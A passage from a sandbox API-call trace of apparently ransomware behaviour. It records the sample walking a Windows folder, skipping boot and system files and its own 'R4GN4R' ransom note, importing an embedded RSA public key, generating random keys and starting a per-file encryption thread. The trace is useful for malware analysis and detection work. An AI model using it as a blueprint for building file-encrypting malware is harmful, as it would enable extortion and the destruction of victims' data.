(lpString1="GetCurrentOOBE.dll", lpString2="boot.ini") returned 1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="bootfont.bin") returned 1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="bootsect.bak") returned 1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="bootmgr") returned 1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="bootmgr.efi") returned 1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="bootmgfw.efi") returned 1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="desktop.ini") returned 1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="iconcache.db") returned -1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="ntldr") returned -1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="ntuser.dat") returned -1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="ntuser.dat.log") returned -1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="ntuser.ini") returned -1 [0167.421] lstrcmpiW (lpString1="GetCurrentOOBE.dll", lpString2="thumbs.db") returned -1 [0167.421] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0167.421] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0167.421] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0167.421] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956819aa, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x956819aa, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x980eecb6, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini", cAlternateFileName="")) returned 1 [0167.422] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1d [0167.422] lstrcpyW (in: lpString1=0x5cfdaa0, lpString2="GetCurrentRollback.ini" | out: lpString1="GetCurrentRollback.ini") returned="GetCurrentRollback.ini" [0167.422] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned=".ini" [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="autorun.inf") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="boot.ini") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="bootfont.bin") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="bootsect.bak") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="bootmgr") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="bootmgr.efi") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="bootmgfw.efi") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="desktop.ini") returned 1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="iconcache.db") returned -1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="ntldr") returned -1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="ntuser.dat") returned -1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="ntuser.dat.log") returned -1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="ntuser.ini") returned -1 [0167.422] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="thumbs.db") returned -1 [0167.422] lstrcmpiW (lpString1=".ini", lpString2=".db") returned 1 [0167.423] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0167.423] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0167.423] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0167.423] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0167.423] lstrcmpiW (lpString1=".ini", lpString2=".drv") returned 1 [0167.423] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0167.423] GetProcessHeap () returned 0x3520000 [0167.423] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0167.424] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" [0167.424] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="")) returned 1 [0167.424] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1d [0167.424] lstrcpyW (in: lpString1=0x5cfdaa0, lpString2="PartnerSetupComplete.cmd" | out: lpString1="PartnerSetupComplete.cmd") returned="PartnerSetupComplete.cmd" [0167.424] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned=".cmd" [0167.424] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0167.424] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="autorun.inf") returned 1 [0167.424] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="boot.ini") returned 1 [0167.424] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="bootfont.bin") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="bootsect.bak") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="bootmgr") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="bootmgr.efi") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="bootmgfw.efi") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="desktop.ini") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="iconcache.db") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="ntldr") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="ntuser.dat") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="ntuser.dat.log") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="ntuser.ini") returned 1 [0167.425] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="thumbs.db") returned -1 [0167.425] lstrcmpiW (lpString1=".cmd", lpString2=".db") returned -1 [0167.425] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0167.425] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0167.425] lstrcmpiW (lpString1=".cmd", lpString2=".lnk") returned -1 [0167.425] lstrcmpiW (lpString1=".cmd", lpString2=".msi") returned -1 [0167.425] lstrcmpiW (lpString1=".cmd", lpString2=".drv") returned -1 [0167.425] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0167.425] GetProcessHeap () returned 0x3520000 [0167.425] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d20058 [0167.428] lstrcpyW (in: lpString1=0x5d20458, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" [0167.428] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0167.428] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1d [0167.428] lstrcpyW (in: lpString1=0x5cfdaa0, lpString2="preoobe.cmd" | out: lpString1="preoobe.cmd") returned="preoobe.cmd" [0167.428] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned=".cmd" [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="autorun.inf") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="boot.ini") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="bootfont.bin") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="bootsect.bak") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="bootmgr") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="bootmgr.efi") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="bootmgfw.efi") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="desktop.ini") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="iconcache.db") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="ntldr") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="ntuser.dat") returned 1 [0167.428] lstrcmpiW (lpString1="preoobe.cmd", lpString2="ntuser.dat.log") returned 1 [0167.429] lstrcmpiW (lpString1="preoobe.cmd", lpString2="ntuser.ini") returned 1 [0167.429] lstrcmpiW (lpString1="preoobe.cmd", lpString2="thumbs.db") returned -1 [0167.429] lstrcmpiW (lpString1=".cmd", lpString2=".db") returned -1 [0167.429] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0167.429] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0167.429] lstrcmpiW (lpString1=".cmd", lpString2=".lnk") returned -1 [0167.429] lstrcmpiW (lpString1=".cmd", lpString2=".msi") returned -1 [0167.429] lstrcmpiW (lpString1=".cmd", lpString2=".drv") returned -1 [0167.429] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0167.429] GetProcessHeap () returned 0x3520000 [0167.429] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d2d1d0 [0167.430] lstrcpyW (in: lpString1=0x5d2d5d0, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" [0167.430] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="")) returned 1 [0167.430] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\SafeOS\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x1d [0167.430] lstrcpyW (in: lpString1=0x5cfdaa0, lpString2="SetupComplete.cmd" | out: lpString1="SetupComplete.cmd") returned="SetupComplete.cmd" [0167.430] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned=".cmd" [0167.430] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0167.430] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="autorun.inf") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="boot.ini") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="bootfont.bin") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="bootsect.bak") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="bootmgr") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="bootmgr.efi") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="bootmgfw.efi") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="desktop.ini") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="iconcache.db") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="ntldr") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="ntuser.dat") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="ntuser.dat.log") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="ntuser.ini") returned 1 [0167.431] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="thumbs.db") returned -1 [0167.431] lstrcmpiW (lpString1=".cmd", lpString2=".db") returned -1 [0167.431] lstrcmpiW (lpString1=".cmd", lpString2=".sys") returned -1 [0167.431] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0167.431] lstrcmpiW (lpString1=".cmd", lpString2=".lnk") returned -1 [0167.431] lstrcmpiW (lpString1=".cmd", lpString2=".msi") returned -1 [0167.431] lstrcmpiW (lpString1=".cmd", lpString2=".drv") returned -1 [0167.431] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0167.431] GetProcessHeap () returned 0x3520000 [0167.431] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d3a348 [0167.646] lstrcpyW (in: lpString1=0x5d3a748, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" [0167.646] FindNextFileW (in: hFindFile=0x3547f00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupComplete.cmd", cAlternateFileName="")) returned 0 [0167.646] GetProcessHeap () returned 0x3520000 [0167.646] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x357e3a8 [0167.646] CryptAcquireContextW (in: phProv=0x357e3a8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x357e3a8*=0x35566e8) returned 1 [0167.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0167.648] GetProcessHeap () returned 0x3520000 [0167.648] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x3592b18 [0167.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x3592b18, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0167.648] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0167.648] GetProcessHeap () returned 0x3520000 [0167.648] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x3592ea8 [0167.648] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x3592ea8, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3592ea8, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0167.648] GetProcessHeap () returned 0x3520000 [0167.648] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3592b18 | out: hHeap=0x3520000) returned 1 [0167.648] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3592ea8, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0167.649] CryptImportPublicKeyInfo (in: hCryptProv=0x35566e8, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x357e3ac | out: phKey=0x357e3ac*=0x3547d80) returned 1 [0167.649] GetProcessHeap () returned 0x3520000 [0167.649] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3592ea8 | out: hHeap=0x3520000) returned 1 [0167.649] LocalFree (hMem=0x35948f0) returned 0x0 [0167.649] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556880) returned 1 [0167.650] CryptGenRandom (in: hProv=0x3556880, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0167.650] CryptReleaseContext (hProv=0x3556880, dwFlags=0x0) returned 1 [0167.650] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0167.655] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35567f8) returned 1 [0167.655] CryptGenRandom (in: hProv=0x35567f8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0167.655] CryptReleaseContext (hProv=0x35567f8, dwFlags=0x0) returned 1 [0167.655] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0167.658] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556bb0) returned 1 [0167.658] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0167.658] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0167.658] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0167.661] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556b28) returned 1 [0167.661] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0167.661] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0167.661] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0167.664] CryptEncrypt (in: hKey=0x3547d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0167.666] GetLastError () returned 0x80090016 [0167.666] CryptEncrypt (in: hKey=0x3547d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0167.666] GetLastError () returned 0x80090016 [0167.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xdfc) returned 0x3d4 [0167.666] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556dd0) returned 1 [0167.667] CryptGenRandom (in: hProv=0x3556dd0, dwLen=0x28, pbBuffer=0x5d2cf7c | out: pbBuffer=0x5d2cf7c) returned 1 [0167.667] CryptReleaseContext (hProv=0x3556dd0, dwFlags=0x0) returned 1 [0167.667] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0167.671] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556cc0) returned 1 [0167.671] CryptGenRandom (in: hProv=0x3556cc0, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0167.671] CryptReleaseContext (hProv=0x3556cc0, dwFlags=0x0) returned 1 [0167.671] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0167.674] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556330) returned 1 [0167.675] CryptGenRandom (in: hProv=0x3556330, dwLen=0x20, pbBuffer=0x5d2cfa4 | out: pbBuffer=0x5d2cfa4) returned 1 [0167.675] CryptReleaseContext (hProv=0x3556330, dwFlags=0x0) returned 1 [0167.675] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0167.678] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3557188) returned 1 [0167.678] CryptGenRandom (in: hProv=0x3557188, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0167.678] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0167.678] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0168.041] CryptEncrypt (in: hKey=0x3547d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2cfc4*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d2cfc4*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.041] GetLastError () returned 0x80090016 [0168.042] CryptEncrypt (in: hKey=0x3547d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2d0c4*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d2d0c4*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.042] GetLastError () returned 0x80090016 [0168.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d20058, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x738) returned 0x3c8 [0168.043] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35564c8) returned 1 [0168.044] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x28, pbBuffer=0x5d3a0f4 | out: 